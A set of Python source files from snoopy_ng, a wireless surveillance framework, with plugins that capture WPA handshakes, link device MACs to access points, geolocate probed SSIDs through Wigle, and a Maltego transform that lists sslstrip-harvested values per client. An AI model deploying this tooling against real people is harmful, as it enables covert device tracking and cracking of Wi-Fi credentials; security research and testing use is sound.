        firstGPS,lastGPS = (gps_c[0][0], gps_c[0][1]), (gps_c[-1][0], gps_c[-1][1])
        latVariance = abs(sorted(gps_c)[0][0]-sorted(gps_c)[-1][0])
        lonVariance = abs(sorted(gps_c)[0][1]-sorted(gps_c)[-1][1])

    s = select([sess.c.location], and_(*filters)).distinct()
    r = db.execute(s)
    results = r.fetchall()
  
    for location in results:
        location = location[0]
        logging.debug(location)
        NewEnt=TRX.addEntity("snoopy.DroneLocation", location)
        #NewEnt.addAdditionalFields("location","location", "strict", location)
        NewEnt.addAdditionalFields("drone","drone", "strict", drone)
        NewEnt.addAdditionalFields("start_time", "start_time", "strict", start_time)
        NewEnt.addAdditionalFields("end_time", "end_time", "strict", end_time)
        if gps_c:
            NewEnt.addAdditionalFields("start_gps", "start_gps", "strict", str(firstGPS))
            NewEnt.addAdditionalFields("end_gps", "end_gps", "strict", str(lastGPS))
            NewEnt.addAdditionalFields("var_gps", "var_gps", "strict", str(latVariance+lonVariance))

    TRX.returnOutput()

main()



#!/usr/bin/python
# -*- coding: utf-8 -*-
# dominic@sensepost.com_
# snoopy_ng // 2014
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
from base64 import b64decode
from xml.sax.saxutils import escape
import re
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)

    #Custom query per transform, but apply filter with and_(*filters) from transformCommon.
    filters = []
    filters.append(weblogs.c.client_ip==ip)
    s = select([weblogs.c.useragent], and_(*filters))
    logging.debug(s) 
    #s = select([ssids.c.ssid]).where(ssids.c.mac==mac).distinct()
    r = db.execute(s)
    results = r.fetchall()
    logging.debug(results)
    #results = [t[0] for t in results]
    TRX = MaltegoTransform()

    illegal_xml_re = re.compile(u'[\x00-\x08\x0b-\x1f\x7f-\x84\x86-\x9f\ud800-\udfff\ufdd0-\ufddf\ufffe-\uffff]')

    for ua in results:
        logging.debug(ua)
        if str(ua).find('None') < 1:
            NewEnt=TRX.addEntity("snoopy.useragent", str(ua))
            NewEnt.addAdditionalFields("ip","Client IP", "strict",ip)

    TRX.returnOutput()

main()
#me = MaltegoTransform()
#me.addEntity("maltego.Phrase","hello bob")
#me.returnOutput()                



#!/usr/bin/python 
# -*- coding: utf-8 -*-

#######################################################
# Maltego Python Local Transform Helper               #
#   Version 0.2                           #
#                                                     #
# Local transform specification can be found at:      #
#    http://ctas.paterva.com/view/Specification       #
#                                                     #
# For more help and other local transforms            #
# try the forum or mail me:                           #
#                                                     #
#   http://www.paterva.com/forum                      #
#                                                     #
#  Andrew MacPherson [ andrew <<at>> Paterva.com ]    #
#                                                     #
#  glenn@sensepost.com:                               #
#   * Modified to allow multiple display args         #
#   * getVar() can have a default value set if non    #
#   * retabbed                                        #
#######################################################
import sys

class MaltegoEntity(object):
    value = "";
    weight = 100;
    displayInformation = [] #None; GW
    additionalFields = [];
    iconURL = "";
    entityType = "Phrase"
    
    def __init__(self,eT=None,v=None):
        if (eT is not None):
            self.entityType = eT;
        if (v is not None):
            self.value = sanitise(v);
        self.additionalFields = [];
        self.displayInformation = []; #None; GW
        
    def setType(self,eT=None):
        if (eT is not None):
            self.entityType = eT;
    
    def setValue(self,eV=None):
        if (eV is not None):
            self.value = sanitise(eV);
        
    def setWeight(self,w=None):
        if (w is not None):
            self.weight = w;
    

    def addDisplayInformation(self,di=None,dl='Info'):
        if (di is not None):
            self.displayInformation.append([dl,di])

#   def setDisplayInformation(self,di=None):
#       if (di is not None):
#           self.displayInformation = di;       
            
    def addAdditionalFields(self,fieldName=None,displayName=None,matchingRule=False,value=None):
        self.additionalFields.append([sanitise(fieldName),sanitise(displayName),matchingRule,sanitise(value)]);
    
    def setIconURL(self,iU=None):
        if (iU is not None):
            self.iconURL = iU;
            
    def returnEntity(self):
        print "<Entity Type=\"" + str(self.entityType) + "\">";
        #self.value = self.value.encode('utf-8')
        print "<Value>%s</Value>" % self.value
        #print "<Value>" + str(self.value) + "</Value>";
        print "<Weight>" + str(self.weight) + "</Weight>";
        if (len(self.displayInformation) > 0):
            print "<DisplayInformation>"
            for i in range(len(self.displayInformation)):
                print '<Label Name=\"'+self.displayInformation[i][0]+'\" Type=\"text/html\"><![CDATA[' + (self.displayInformation[i][1]) + ']]></Label>'
            print '</DisplayInformation>'


        if (len(self.additionalFields) > 0):
            print "<AdditionalFields>";
            for i in range(len(self.additionalFields)):
                if (str(self.additionalFields[i][2]) <> "strict"):
                    print "<Field Name=\"" + str(self.additionalFields[i][0]) + "\" DisplayName=\"" + str(self.additionalFields[i][1]) + "\">" + str(self.additionalFields[i][3]) + "</Field>";
                else:
                    print "<Field MatchingRule=\"" + str(self.additionalFields[i][2]) + "\" Name=\"" + str(self.additionalFields[i][0]) + "\" DisplayName=\"" + str(self.additionalFields[i][1]) + "\">" + str(self.additionalFields[i][3]) + "</Field>";
            print "</AdditionalFields>";
        if (len(self.iconURL) > 0):
            print "<IconURL>" + self.iconURL + "</IconURL>";
        print "</Entity>";



    def returnEntity_(self):
        print "<Entity Type=\"" + (self.entityType) + "\">";
        print "<Value>" + (self.value) + "</Value>";
        print "<Weight>" + str(self.weight) + "</Weight>";
#       if (self.displayInformation is not None):
#           print "<DisplayInformation><Label Name=\"\" Type=\"text/html\"><![CDATA[" + (self.displayInformation) + "]]></Label></DisplayInformation>";
        if (len(self.displayInformation) > 0):
            print "<DisplayInformation>"
            for i in range(len(self.displayInformation)):
                print '<Label Name=\"'+self.displayInformation[i][0]+'\" Type=\"text/html\"><![CDATA[' + (self.displayInformation[i][1]) + ']]></Label>'
            print '</DisplayInformation>'

        if (len(self.additionalFields) > 0):
            print "<AdditionalFields>";
            for i in range(len(self.additionalFields)):
                if ((self.additionalFields[i][2]) <> "ict"):
                    #print u"<Field Name=\"%s \" DisplayName=\"%s\">%s</Field>" %(self.additionalFields[i][0], self.additionalFields[i][1], self.additionalFields[i][3]);
                    print "<Field Name=\"" + (self.additionalFields[i][0]) + "\" DisplayName=\"" + (self.additionalFields[i][1]) + "\">" + (self.additionalFields[i][3]) + "</Field>";
                else:
                    print "<Field MatchingRule=\"" + str(self.additionalFields[i][2]) + "\" Name=\"" + str(self.additionalFields[i][0]) + "\" DisplayName=\"" + str(self.additionalFields[i][1]) + "\">" + str(self.additionalFields[i][3]) + "</Field>";
                    #print "<Field MatchingRule=\"" + (self.additionalFields[i][2]) + "\" Name=\"" + (self.additionalFields[i][0]) + "\" DisplayName=\"" + (self.additionalFields[i][1]) + "\">" + (self.additionalFields[i][3]) + "</Field>";
            print "</AdditionalFields>";
        if (len(self.iconURL) > 0):
            print "<IconURL>" + self.iconURL + "</IconURL>";
        print "</Entity>";
    
class MaltegoTransform(object):
    entities = []
    exceptions = []
    UIMessages = []
    values = {};
    
    def __init__(self):
        values = {};
        value = None;
    
    def parseArguments(self,argv):
        if (argv[1] is not None):
            self.value = argv[1];
            
        if (len(argv) > 2):
            if (argv[2] is not None):
                vars = argv[2].split('#');
                for x in range(0,len(vars)):
                    vars_values = vars[x].split('=')
                    if (len(vars_values) == 2):
                        self.values[vars_values[0]] = vars_values[1];
    
    def getValue(self):
        if (self.value is not None):
            return self.value;
    
    def getVar(self,varName,default=None):
        if (varName in self.values.keys()) and (self.values[varName] is not None):
            return self.values[varName];
        else:
            return default
    
    def addEntity(self,enType,enValue):
        me = MaltegoEntity(enType,enValue);
        self.addEntityToMessage(me);
        return self.entities[len(self.entities)-1];
    
    def addEntityToMessage(self,maltegoEntity):
        self.entities.append(maltegoEntity);
        
    def addUIMessage(self,message,messageType="Inform"):
        self.UIMessages.append([messageType,message]);
    
    def addException(self,exceptionString):
        self.exceptions.append(exceptionString);
        
    def throwExceptions(self):
        print "<MaltegoMessage>";
        print "<MaltegoTransformExceptionMessage>";
        print "<Exceptions>"
        
        for i in range(len(self.exceptions)):
            print "<Exception>" + self.exceptions[i] + "</Exception>";
        print "</Exceptions>"   
        print "</MaltegoTransformExceptionMessage>";
        print "</MaltegoMessage>";
        exit();
        
    def returnOutput(self):
        print "<MaltegoMessage>";
        print "<MaltegoTransformResponseMessage>";
                        
        print "<Entities>"
        for i in range(len(self.entities)):
            self.entities[i].returnEntity();
        print "</Entities>"
                        
        print "<UIMessages>"
        for i in range(len(self.UIMessages)):
            print "<UIMessage MessageType=\"" + self.UIMessages[i][0] + "\">" + self.UIMessages[i][1] + "</UIMessage>";
        print "</UIMessages>"
            
        print "</MaltegoTransformResponseMessage>";
        print "</MaltegoMessage>";
        
    def writeSTDERR(self,msg):
        sys.stderr.write((msg));
    
    def heartbeat(self):
        self.writeSTDERR("+");
    
    def progress(self,percent):
        self.writeSTDERR("%" + (percent));
    
    def debug(self,msg):
        self.writeSTDERR("D:" + (msg));
            


def sanitise(value):
    if value is None:
        return ""
    replace_these = ["&",">","<"];
    replace_with = ["&amp;","&gt;","&lt;"];
    tempvalue = value;
    for i in range(0,len(replace_these)):
        tempvalue = tempvalue.replace(replace_these[i],replace_with[i]);
    return tempvalue;



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import re
from sqlalchemy import MetaData, Table, Column, String, Integer
from scapy.all import ARP, Ether

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)


class Snarf():
    """Grabs BSSID from arp frames (thanks Hubert)"""
    def __init__(self,**kwargs):
        self.device_bssids = {}

    @staticmethod
    def get_tables():
        """Make sure to define your table here"""
        table = Table('bssid_arps', MetaData(),
                      Column('mac', String(12), primary_key=True),
                      Column('bssid', String(12), primary_key=True),
                      Column('sunc', Integer, default=0))
        return [table]

    def proc_packet(self, packet):
        if packet.haslayer(ARP) and packet.haslayer(Ether):
            mac = re.sub(':', '', packet.addr2)
            bssid = packet[Ether].dst
            if bssid != 'ff:ff:ff:ff:ff:ff':
                self.device_bssids[(mac, bssid)] = 0

    def get_data(self):
        tmp = []
        sunc = []
        for k, v in self.device_bssids.iteritems():
            if v == 0:
                tmp.append( {"mac": k[0], "bssid": k[1]} )
                sunc.append((k[0], k[1]))
        if sunc:
            for foo in sunc:
                mac, bssid = foo[:2]
                self.device_bssids[(mac, bssid)] = 1
            return ("bssid_arps", tmp)
        return []



#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from sqlalchemy import create_engine, MetaData, Table, Column, String,\
                   select, and_, Integer
from collections import deque
from sqlalchemy.exc import *
from includes.common import *
import includes.common as common
import time
from datetime import datetime
from threading import Thread
import inspect
logging.basicConfig(level=logging.DEBUG, filename='/tmp/snoopy_server.log',
                format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                datefmt='%Y-%m-%d %H:%M:%S')
from includes import webserver
import os
from includes.fonts import *

#from includes import xbeeserver #ProVersion

#def get_plugins():
#    filename = os.path.split(inspect.getfile(inspect.currentframe()))[1].replace(".py","")
#    pluginNames = common.get_plugins()
#    pluginNames.remove("server")
#    plugins = []
#    for plug in pluginNames:
#        plug = "plugins." + plug
#        m = __import__(plug, fromlist="Snoop").Snoop
#        plugins.append(m)
#    return plugins

def get_plugins():
    filename = os.path.split(inspect.getfile(inspect.currentframe()))[1].replace(".py","")
    this_plugin = __import__("plugins." + filename, fromlist="Snoop").Snoop
    plugins = common.get_plugins()
    plugins.remove(this_plugin)
    return plugins

class Snoop(Thread):
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.setDaemon(True)
        # Process arguments passed to module
        self.port = kwargs.get('port',9001)
        self.ip = kwargs.get('ip','0.0.0.0')
        self.cert = kwargs.get('cert',None)
        self.cert_key = kwargs.get('cert_key',None)
        self.db = kwargs.get('dbms',None)

        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

        if self.db:
            self.metadata = MetaData(self.db)       #If you need to access the db object. N.B Use for *READ* only.
            self.metadata.reflect()
        self.data = deque(maxlen=100000)

    def run(self):
        logging.info("Running webserver on '%s:%s'" % (self.ip,self.port))
        webserver.run_webserver(self.port,self.ip,self.cert,self.cert_key,self.db)

    def is_ready(self):
        #Perform any functions that must complete before plugin runs
        return True

    def stop(self):
        self.RUN = False
        self._Thread__stop() #Ouch. Probably a bad approach.

    @staticmethod
    def get_parameter_list():
        info = {"info" : "Runs a server - allowing local data to be synchronized remotely.",
                "parameter_list" : [("port=<int>","The HTTP port to listen on."),
                                    ("cert=<path>","The SSL certificate path (implies server will use HTTPS)."),
                                    ("cert_key=<path>","The certificate key path (implies server will use HTTPS)."),
                                    ("xbee=<int>","The XBee PIN to listen on (see Pro version).")
                                    ]
                }

        return info

    def get_data(self):
        new_data = webserver.poll_data()
        if new_data:
            logging.info("Plugin %s%s%s caught data for %s%d%s tables." % (GR,self.fname,G,GR,len(new_data),G))
        return new_data

    @staticmethod
    def get_tables():
        return []

if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import re
from sqlalchemy import MetaData, Table, Column, Integer, String, Unicode
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
#from scapy.all import Dot11Beacon, Dot11Elt
from collections import deque
from includes.fonts import *
import os
import cpyrit.pckttools
from base64 import b64encode

class Snarf():
    """Capture WPA handshakes"""

    def __init__(self, **kwargs):
        self.handshakes = deque()
        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]
        self.cp = cpyrit.pckttools.PacketParser(new_ap_callback=None, new_auth_callback=self.auth_handler)

    def auth_handler(self, auth):
        if auth.station.ap.isCompleted():
            json_eap = {"sta_mac": auth.station.mac, "ap_mac" : auth.station.ap.mac, "ssid": auth.station.ap.essid, "anonce": b64encode(auth.anonce), "snonce": b64encode(auth.snonce), "keymic": b64encode(auth.keymic), "keymic_frame": b64encode(auth.keymic_frame), "version": auth.version, "quality": auth.quality, "spread": auth.spread}
            self.handshakes.append(json_eap)
            if self.verb > 0:
                logging.info("Sub-plugin %s%s%s captured new handshake for %s%s%s" % (GR,self.fname,G,GR,auth.station.ap.essid, G))

    @staticmethod
    def get_tables():
        """Make sure to define your table here"""
        table = Table('wpa_handshakes', MetaData(),
                      Column('ssid', String(64), primary_key=True),
                      Column('ap_mac', String(12), primary_key=True, autoincrement=False),
                      Column('sta_mac', String(12), primary_key=True, autoincrement=False),
                      Column('anonce', String(50), primary_key=True, autoincrement=False),
                      Column('snonce', String(50)),
                      Column('keymic', String(24)),
                      Column('keymic_frame', String(180)),
                      Column('version', String(10)),
                      Column('quality', Integer),
                      Column('spread', Integer),
                      Column('sunc', Integer, default=0))
        return [table]

    def proc_packet(self, p):
        self.cp.parse_packet(p)


    def get_data(self):
        rtnData=[]
        while self.handshakes:
            rtnData.append(self.handshakes.popleft())
        if rtnData:
            return [("wpa_handshakes", rtnData)]



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
from sqlalchemy import Float, DateTime, String, Integer, Table, MetaData, Column, select, outerjoin
from threading import Thread
from collections import deque
import os
import time
from includes.wigle_api import Wigle
from includes.fonts import *
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')


class Snoop(Thread):
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.CHECK_FREQ = 15    #Check every n seconds for new SSIDs
        self.ssids_to_lookup = deque()
        self.ssid_addresses = deque()
        self.bad_ssids = {}
        self.current_lookup = ''
        self.successfully_geolocated = deque()
        self.recently_found = deque(maxlen=1000)    #We keep a register of the last 1000, to prevent superfluous lookups before results make it into the db
        self.wig = None #Wigle object
        self.last_lookup = 0

        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

        # Process arguments passed to module
        self.username = kwargs.get('username')
        self.password = kwargs.get('password')
        self.email = kwargs.get('email')
        self.proxy = kwargs.get('proxy')

        self.db = kwargs.get('dbms',None)
        self.wig = Wigle(self.username,self.password, self.email,self.proxy)

        self.last_checked = 0
        self.metadata = MetaData(self.db)
        self.metadata.reflect()
        self.db_ready = False
        self.is_db_ready()

    def querydb(self):
        wigle = self.metadata.tables['wigle']
        ssids = self.metadata.tables['wifi_client_ssids']
        now = os.times()[4]
        if abs(now - self.last_checked) > self.CHECK_FREQ:
            s = outerjoin(ssids,wigle, ssids.c.ssid==wigle.c.ssid).select(wigle.c.ssid == None)
            r = self.db.execute(s)
            results = r.fetchall()
            new_ssids = [t[1] for t in results] #Second field in each result row

            for ssid in new_ssids:
                if ssid not in self.ssids_to_lookup and ssid != self.current_lookup and ssid not in self.recently_found:
                    if ssid in self.bad_ssids and self.bad_ssids[ssid] > 2:
                        logging.debug("Ignoring bad SSID '%s' after %d failed lookups" %(ssid, self.bad_ssids[ssid]))
                    else:
                        self.ssids_to_lookup.append(ssid)
            self.last_checked = now
            if len(self.ssids_to_lookup) > 0:
                #Re-order results giving preference to known interesting ones. If 'weighted' is empty,
                # nothing will happen.
                #weighted = []
                weighted = ["SKY", "TALKTALK", "BTH", "BTBusinessHub", "Plusnet", "virginmedia", "Livebox"]
                for w in weighted:
                    for r in range(len(self.ssids_to_lookup)):
                        try:
                            result = self.ssids_to_lookup[r]
                        except Exception, e:
                            logging.error("Error prioritizsing SSIDs: '%s'.\nData [%d] was: '%s'\n" %(e,r,str(self.ssids_to_lookup)))
                        else:
                            if result.startswith(w):
                                del self.ssids_to_lookup[r]
                                self.ssids_to_lookup.appendleft(result)

                if self.verb > 0 and self.last_lookup != len(self.ssids_to_lookup):
                    self.last_lookup = len(self.ssids_to_lookup)
                    logging.info("Plugin %s%s%s has %s%d%s SSIDs to lookup." % (GR,self.fname,G,GR,len(self.ssids_to_lookup),G))
                logging.debug("SSID lookup queue has %d SSIDs to query" % len(self.ssids_to_lookup))

    def run(self):
        """Thread runs independently looking up SSIDs"""
        wigle = self.metadata.tables['wigle']
        while self.RUN:
            if not self.wig.cookies:
                if not self.wig.login():
                    logging.error("Login to Wigle failed! Aborting wigle plugin.")
                    self.stop()
                    break
            try:
                self.current_lookup = self.ssids_to_lookup.popleft()
                #self.current_lookup = self.current_lookup.decode('utf-8', 'ignore')
                logging.debug("Looking up %s (%s)" %(self.current_lookup,type(self.current_lookup)))
            except IndexError:
                pass
            else:
                locations = None
                try:
                    locations = self.wig.lookupSSID(self.current_lookup)
                except Exception, e:
                    logging.error("Exception whilst querying Wigle: '%s'" % e)
                    #logging.error("Exception whilst looking up '%s': '%s'" % (self.current_lookup,e))
                    time.sleep(2)
                if locations:
                    if 'error' in locations:
                        if 'shun' in locations['error']:
                            logging.info("Wigle account and/or IP has been shunned, backing off for 20 minutes")
                            self.ssids_to_lookup.append(self.current_lookup)
                            for i in range(60*20):
                                if not self.RUN:
                                    break
                                time.sleep(1)
                        elif 'Cookie not set' in locations['error']:
                            logging.error("No valid Wigle cookie. Login may have failed.")
                        else:
                            logging.error("An error occured whilst looking up SSID '%s', will retry in 5 seconds (Error: '%s')" %(self.current_lookup,locations['error']))
                            self.ssids_to_lookup.append(self.current_lookup)
                            time.sleep(5)
                    else:
                        self.recently_found.append(self.current_lookup)
                        for location in locations:
                            self.successfully_geolocated.append( location )
                        if self.verb > 0:
                            if locations[0]['overflow'] == 0:
                                logging.info("Plugin %s%s%s geolocated SSID '%s%s%s' to %s%d%s possible locations." % (GR,self.fname,G,GR,self.current_lookup,G,GR,len(locations),G))
                            else:
                                logging.debug("Wigle ignoring SSID '%s' (likely >100 locations)" %(self.current_lookup))

            #time.sleep(2)

    def is_db_ready(self):
        #Wait to ensure tables exist
        while True:
            try:
                self.metadata.reflect()
                wigle = self.metadata.tables['wigle']
                ssids = self.metadata.tables['wifi_client_ssids']
            except KeyError:
                logging.debug("Wigle waiting for tables 'wigle' and 'wifi_client_ssids' to exist")
                time.sleep(1)
            else:
                break
        time.sleep(2)
        self.db_ready = True


    def is_ready(self):
        return self.db_ready

    def stop(self):
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        info = {"info" : "Looks up SSID locations via Wigle (from the ssid table).",
                "parameter_list" : [("username=<u>","Wigle username"),
                                    ("password=<p>","Wigle password"),
                                    ("email=<foo@bar.com>","Supplied in query to OpenStreetView. It's polite to use your real email")
                                    ]
                }
        return info

    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        # First we query the DB for fresh SSIDs, as we can have our own lock
        #  then we return any data that may have been found from the previous operation
        self.querydb()
        data = []
        while self.successfully_geolocated: data.append(self.successfully_geolocated.pop())

        if data:
            return [("wigle", data)]
        else:
            return []

    @staticmethod
    def get_tables():

        table = Table('wigle',MetaData(),
                              Column('ssid', String(length=100), primary_key=True),
                              Column('lat', Float(), default=999, primary_key=True, autoincrement=False ),
                              Column('long', Float(), default=999, primary_key=True, autoincrement=False),
                              Column('last_update', Integer, default=0 ),
                              Column('mac', String(length=18), default='' ),
                              Column('overflow', Integer),
                              Column('longaddress', String(length=150),default='' ),
                              Column('shortaddress', String(length=50),default='' ),
                              Column('city', String(length=50),default='' ),
                              Column('code', String(length=50), default='' ),
                              Column('country', String(length=50), default=''),
                              Column('county', String(length=50), default='' ),
                              Column('postcode', String(length=10), default='' ),
                              Column('road', String(length=50), default='' ),
                              Column('state', String(length=50), default='' ),
                              Column('suburb', String(length=50), default='' ),
                              Column('sunc', Integer, default=0))
        return [table]


if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com 
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)

    #Custom query per transform, but apply filter with and_(*filters) from transformCommon.
#    s = select([proxs.c.drone], and_(*filters)).distinct()
    s = select([sess.c.drone], and_(*filters)).distinct()
    logging.debug(filters)
    logging.debug(s)
    r = db.execute(s)
    results = r.fetchall()
    results = [t[0] for t in results]
    TRX = MaltegoTransform()

    for drone in results:
        logging.debug(drone)
        NewEnt=TRX.addEntity("snoopy.Drone", drone)
        NewEnt.addAdditionalFields("properties.drone","drone", "strict",drone)
        NewEnt.addAdditionalFields("start_time", "start_time", "strict", start_time)
        NewEnt.addAdditionalFields("end_time", "end_time", "strict", end_time)
        #NewEnt.addAdditionalFields("drone", "drone", "strict", drone)
        #NewEnt.addAdditionalFields("location", "location", "strict", location)
    TRX.returnOutput()

main()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
from sqlalchemy import Float, DateTime, String, Integer, Table, MetaData, Column #As required
from threading import Thread
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')
import time
from collections import deque
from random import randint
import datetime
from threading import Thread
import os
from includes.fonts import *

class Snoop(Thread):
    """This is an example plugin."""
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.data_store = deque(maxlen=1000)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]
        # Process arguments passed to module
        self.var01 = kwargs.get('var01','default01')
        self.var02 = kwargs.get('var02','default02')
        self.verb = kwargs.get('verbose', 0)

        self.db = kwargs.get('dbms',None)
        if self.db:
            self.metadata = MetaData(self.db)       #If you need to access the db object. N.B Use for *READ* only.
            self.metadata.reflect()

    def run(self):
        while self.RUN:
            new_value = randint(1,52) #Pick a card, any card
            now = datetime.datetime.now()
            self.data_store.append({'var01':self.var01, 'var02':self.var02, 'time':now, 'rand_num':new_value, 'sunc':0})
            logging.debug("Added %d" % new_value)
            if self.verb > 0:
                logging.info("Plugin %s%s%s created new random number: %s%s%s" % (GR,self.fname,G,GR,new_value,G))   
            time.sleep(2)

    def is_ready(self):
        #Perform any functions that must complete before plugin runs
        return True

    def stop(self):
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        info = {"info" : "This is a test plugin. Testing 1,2,3. Can you hear me?",
                "parameter_list" : [ ("x=<y>","Test parameter one."),
                                     ("v=[True|False]","Test parameter two.")]
                }
        return info


    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        #e.g of return data - [("tbl_name", [{'var01':99, 'var02':199}]
        rtnData=[]
        while self.data_store:
            rtnData.append(self.data_store.popleft())
        if rtnData:
            return [("example_table", rtnData)]
        else:
            return []

    @staticmethod
    def get_tables():
        """This function should return a list of table(s)"""

        table = Table('example_table',MetaData(),
                              Column('time', DateTime, default='' ),
                              Column('rand_num', Integer, default='' ),
                              Column('var01', String(length=20)),
                              Column('var02', String(length=20)),
                              Column('sunc', Integer, default=0))   #Omit this if you don't want to sync
        return [table]

if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
from base64 import b64decode
from xml.sax.saxutils import escape
import re
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)
    global TRX
    ip = TRX.getVar("properties.client_ip")
    if TRX.getVar("client_ip"):
        ip = TRX.getVar("client_ip")

    domain = TRX.getVar("domain")

    filters = []

    if ip:
        filters.append( sslstrip.c.client == ip )
        if domain:
            filters.append( sslstrip.c.domain == domain)
        
        s = select([sslstrip.c.key, sslstrip.c.value], and_(*filters)).distinct()
        results = db.execute(s).fetchall()

        for res in results:
            key, value = res
            NewEnt=TRX.addEntity("snoopy.sslstripResult", key)
            NewEnt.addAdditionalFields("key","key", "strict", value)      
            NewEnt.addAdditionalFields("value","Value", "strict", value)      

        TRX.returnOutput()

    #Custom query per transform, but apply filter with and_(*filters) from transformCommon.
    filters = []
    
    filters.extend( (leases.c.mac == mac, sslstrip.c.client == leases.c.ip))

    if domain:
        filters.append( sslstrip.c.domain == domain )
    s = select([sslstrip.c.domain, leases.c.mac, leases.c.ip], and_(*filters))
    r = db.execute(s)
    results = r.fetchall()
    TRX = MaltegoTransform()
    illegal_xml_re = re.compile(u'[\x00-\x08\x0b-\x1f\x7f-\x84\x86-\x9f\ud800-\udfff\ufdd0-\ufddf\ufffe-\uffff]')

    for res in results:
        domain, client_mac, client_ip = res
        NewEnt=TRX.addEntity("snoopy.Site", domain)
        NewEnt.addAdditionalFields("domain","domain", "strict",domain)
        NewEnt.addAdditionalFields("mac","Client Mac", "strict",client_mac)
        NewEnt.addAdditionalFields("client_ip","Client IP", "strict",client_ip)

    TRX.returnOutput()

main()
#me = MaltegoTransform()
#me.addEntity("maltego.Phrase","hello bob")
#me.returnOutput()                



from datetime import datetime
from sqlalchemy import DateTime
import time
import json
from includes.common import get_tables
import logging

def date_to_epoch(_dt):
	return time.mktime(_dt.utctimetuple())

def epoch_to_date(_et):
	return datetime.fromtimestamp(_et)

obj_to_json = { 
		datetime : date_to_epoch 
	       }

json_to_obj = { 
		DateTime : epoch_to_date 
	       }


col_type_mapper = {}
def load_col_type_mapper():
	global col_type_mapper
	tbls = get_tables()
	for tbl in tbls:
		for col in tbl.columns:
			typ = type(col.type)
			if json_to_obj.get(typ):
				col_type_mapper[(tbl.name,col.name)] = json_to_obj.get(typ)
			
	
def objs_to_json(_data):
    for r in range(len(_data['data'])):
        row = _data['data'][r]
        for name, value in row.iteritems():
            if obj_to_json.get( type(value) ):
                f = obj_to_json[ type(value) ]
                _data['data'][r][name] = f(value)

    try:
       return json.dumps(_data)
    except:
       print _data

def json_to_objs(_json):
    if not col_type_mapper:
        logging.debug("Preloading table mappings...")
        load_col_type_mapper()

    _data = json.loads(_json)		
    table = _data['table']
    for r in range(len(_data['data'])):
        row = _data['data'][r]
        for name, value in row.iteritems():
            if col_type_mapper.get( (table, name) ):
                f = col_type_mapper[ (table, name) ]
                _data['data'][r][name] = f(value)

    return _data


def json_list_to_objs(_json):
    """Take a list of table data, and convert to a list of dicts"""
    if not col_type_mapper:
        logging.debug("Preloading table mappings...")
        load_col_type_mapper()

    _data_list = json.loads(_json)
    _data_to_return = []
    for _data in _data_list:
        table = _data['table']
        for r in range(len(_data['data'])):
            row = _data['data'][r]
            for name, value in row.iteritems():
                if col_type_mapper.get( (table, name) ):
                    f = col_type_mapper[ (table, name) ]
                    _data['data'][r][name] = f(value)
        _data_to_return.append(_data)
    return _data_to_return



